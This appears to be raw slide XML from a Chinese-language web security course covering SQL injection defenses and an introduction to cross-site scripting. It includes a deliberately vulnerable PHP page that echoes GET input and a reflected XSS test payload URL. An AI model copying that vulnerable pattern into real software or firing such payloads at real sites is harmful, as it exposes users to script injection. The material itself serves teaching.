            <a:ext cx="6832600" cy="21037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3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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5" presetID="3" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="blinds(vertical)" transition="in">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23" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="4*#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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 grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="45" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="44" grpId="3"/>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5073650" y="2151856"/>
            <a:ext cx="28575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使用存储过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Shape 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563561" y="3293267"/>
            <a:ext cx="11876090" cy="391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使用存储过程的效果和使用预编译语句类似，其区别就是存储过程需要先将SQL语句定义在数据库中。但需要注意的是，存储过程中也可能会存在注入问题，应该尽量避免在存储过程中使用动态的SQL语句。如果无法避免，则应该使用严格的输入过滤或者编码函数来处理用户的输入数据。</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9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="289"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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9" presetID="2" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="290"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="290"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="289"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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5073650" y="1641474"/>
            <a:ext cx="28575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检查数据类型</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="Shape 293"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38099" y="3656011"/>
            <a:ext cx="12927344"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solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>settype($offset, ‘integer’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$query = “SELECT id, name, FROM products ORDER BY name LIMIT 20 OFFSET $offset;”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>//please note %d in the format string, using %s would be meaningless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$query = sprintf(“SELECT id ,name FROM products ORDER BY name LIMIT 20 OFFSET %id ;”,$offset);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="228600" algn="l">
              <a:defRPr sz="2900">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Shape 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2824802" y="7705725"/>
            <a:ext cx="735360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atin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>类型只能为integer，在这种情况下是无法注入的</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lt" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="293"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="10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lt" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="294"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="294"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="292" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="293" grpId="2"/>
    </p:bldLst>
  </p:timing>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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6380905" y="1273175"/>
            <a:ext cx="241402"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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="Shape 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5073650" y="102392"/>
            <a:ext cx="28575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使用安全函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="Shape 298"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467517" y="1433512"/>
            <a:ext cx="12069766"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例如之前我们的举例，用了mysql_real_escape_string(),可以被绕过。因此我们要使用一些安全的编码函数。例如在mysql中，需要按照以下思路编码字符：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="Shape 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234871" y="3679030"/>
            <a:ext cx="8528457" cy="5270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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>NUL  (0x00) —&gt; \0 [this is zero ,not the letter o]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>BS     (0x08) —&gt; \b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>TAB   (0x09) —&gt; \t</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>LF      (0x0a) —&gt; \n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>CR     (0x0d) —&gt; \r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>SUB   (0x1a) —&gt; \z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>“         (0x22) —&gt; \”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>%       (0x25) —&gt; \%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>‘         (0x27) —&gt; \’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>\         (0x5c) —&gt; \\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3100">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>_        (0x5f)  —&gt;  _</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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="297"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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298"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29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10" grpId="3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="299"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="18"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3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="297" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="298" grpId="2"/>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xfrm>
            <a:off x="950911" y="1352550"/>
            <a:ext cx="11099803" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>跨站脚本漏洞及防范</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Shape 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544511" y="4304505"/>
            <a:ext cx="11914190"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900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>跨站脚本攻击，英文全称是cross site script，本来缩写是css，但是为了和层叠样式表（cascading style sheet ,css）有所区别，所以叫xss。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="Shape 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="488949" y="6521450"/>
            <a:ext cx="12025315"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900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>xss攻击，通常指黑客通过’html注入’篡改了网页，插入了恶意的脚本，从而在用户浏览网页时，控制用户浏览器的一种攻击。</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074737" y="439736"/>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简单的举例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="Shape 306"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1150937" y="1345405"/>
            <a:ext cx="735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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>一个页面直接把用户输入，输出到页面上：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Shape 307"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1474787" y="2552700"/>
            <a:ext cx="4155949"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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$input = $_GET[“test”];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>echo $input;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Shape 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951801" y="5055392"/>
            <a:ext cx="568147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Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>构造如下payload就可以弹窗了：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="Shape 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1048035" y="5730873"/>
            <a:ext cx="111103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C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>http://www.sysorem.xyz/test.php?test=1&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Shape 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1398587" y="1987153"/>
            <a:ext cx="151180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rgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>test.php</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wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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06"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30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10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="10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07"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30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308"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="30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309"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
